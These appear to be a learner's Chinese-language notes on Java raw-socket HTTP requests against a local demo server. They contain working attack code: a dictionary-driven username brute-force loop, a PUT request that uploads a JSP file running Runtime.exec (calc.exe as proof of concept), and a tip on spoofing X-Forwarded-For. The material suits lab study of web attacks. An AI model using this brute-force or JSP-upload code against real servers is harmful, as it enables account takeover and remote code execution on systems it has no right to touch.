BufferedReader
BufferedReader(Reader in)
创建一个使用默认大小输入缓冲区的缓冲字符输入流。
String readLine()
读取一个文本行。
StringBuffer
StringBuffer()
构造一个其中不带字符的字符串缓冲区,其初始容量为 16 个字符。
StringBuffer append(String str)
将指定的字符串追加到此字符序列。
StringBuffer append(StringBuffer sb)
将指定的 StringBuffer 追加到此序列中。
X-Forwarded-For,IP地址—改变头文件地址;
Get爆破
package com.mtlk.baopo;
import java.io.*;
import java.net.Socket;
import java.util.Scanner;
public class Get implements Runnable{
Socket s; //定义全局变量
private String name;
private boolean boo = true;
public Get() throws IOException,InterruptedException{
s = new Socket("127.0.0.1",8080); //目标IP,与连接端口
new Thread(this).start(); //开启线程
send(); //调用下面方法
}
private void send()throws IOException,InterruptedException {
PrintWriter pw = new PrintWriter(s.getOutputStream()); //发送到端口的内容做封装
FileInputStream fis = new FileInputStream("E:/text/log.txt"); //将字典库导出
byte[]bs = new byte[fis.available()]; //将字典库导入到一个比特数组
fis.read(bs); //读取比特数组
String context = new String(bs); //将比特数组转化为字符串
String[] mess = context.split("\r\n"); //按空格拆分字符串
for (String mes:mess){
name = mes;
StringBuffer request = new StringBuffer("GET /http/HttpDemo?userName="+name+"&passWord=123456 HTTP/1.1\r\n"); //写入访问网页,按格式填入--localhost:8080/http/HttpDemo?userName=admin&passWord=123456(源网页)
request.append("HOST:127.0.0.1\r\n"); //附加格式
pw.println(request.toString()); //写入get请求格式
pw.flush(); //刷新
Thread.sleep(2000); //设置延迟
}
}
@Override
public void run() {
try {
InputStream is = s.getInputStream(); //获取端口收到的消息
Scanner sn = new Scanner(is); //写入控制台
// BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(is, "UTF-8"));
while (boo) {
// if (bufferedReader.readLine().contains("登录成功")) {
if (sn.hasNextLine()) { //判断是否有下一行
if (sn.nextLine().contains("登录成功")) { //判断端口接收信息
System.out.println("用户名是:" + name);
System.out.println("爆破成功");
return; //返回值
}
// System.out.println(bufferedReader.readLine());
// }
}
}
} catch (IOException e) {
e.printStackTrace();
}
}
public static void main(String[] args) throws IOException, InterruptedException {
new Get();
}
}
post请求
package com.mtlk.baopo;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.net.Socket;
import java.sql.SQLOutput;
import java.util.Scanner;
public class Post {
public static void main(String[] args) throws IOException {
String body ="name=admin&pass=123456"; //请求体信息
StringBuilder request = new StringBuilder("POST /http/HttpDemo HTTP/1.1\r\n"); //请求url
request.append("HOST:127.0.0.1\r\n"); //请求IP
request.append("Content-Type:application/x-www-form-urlencoded\\r\\n"); //请求格式
request.append("Content-Length:"+body.length()+"\r\n\r\n"); //请求格式
request.append(body); //请求体
System.out.println(request.toString());
Socket s = new Socket("127.0.0.1",8080); //Socket规定的IP和端口
PrintWriter pw = new PrintWriter(s.getOutputStream(),true); //输出到端口的内容
pw.println(request.toString()); //将请求体输出到端口
pw.flush(); //刷新
InputStream is = s.getInputStream(); //获取端口收到的消息
Scanner sc = new Scanner(is); //输入到控制台
System.out.println("--------------------------------");
while (sc.hasNextLine()){
System.out.println(sc.nextLine()); //将控制台内容输出
}
}
}
put###
package com.mtlk.baopo;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.Scanner;
public class Put {
public static void main(String[] args) throws IOException {
String body = "<%Runtime.getRuntime().exec('c:/windows/system32/calc.exe')%>"; //请求体,调用计算机程序
StringBuilder request = new StringBuilder("PUT /test.jsp%20 HTTP/1.1\r\n"); //请求格式
request.append("HOST:127.0.0.1\r\n");
request.append("Content-Type:text/html\r\n");
request.append("Content-Length:"+body.length()+"\r\n\r\n");
request.append(body);
System.out.println(request.toString()); //请求体转化为字符串型
Socket s = new Socket("127.0.0.1",8080); //创建连接
PrintWriter pw = new PrintWriter(s.getOutputStream(),true); //获取输出流
pw.println(request.toString()); //请求体转化为字符串写入输出流
pw.flush(); //刷新
InputStream is = s.getInputStream(); //获取输入流
Scanner sc = new Scanner(is); //将输入流写入
System.out.println("-------------------------------");
while (sc.hasNextLine()){ //扫描是否有下一行
System.out.println(sc.nextLine()); //输出获取的内容
}
}
}
optios请求
package com.mtlk.baopo;
import java.io.IOException;
import java.io.InputStream;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.Scanner;
public class Options {
public static void main(String[] args) throws IOException {
Socket s = new Socket("127.0.0.1",8080); //建立连接
StringBuilder request = new StringBuilder("OPTIONS*HTTP/1.1\r\n"); //请求格式
request.append("HOST:127.0.0.1\r\n");
System.out.println(request.toString());
PrintWriter pw = new PrintWriter(s.getOutputStream()); //获取输出流
pw.println(request.toString()); //写入输出流
pw.flush(); //刷新
InputStream is = s.getInputStream(); //获取输入流
Scanner sc = new Scanner(is); //输入流写入控制台
System.out.println("---------response----------");
while (sc.hasNextLine()){
System.out.println(sc.nextLine()); //打印输入流
}
}
}
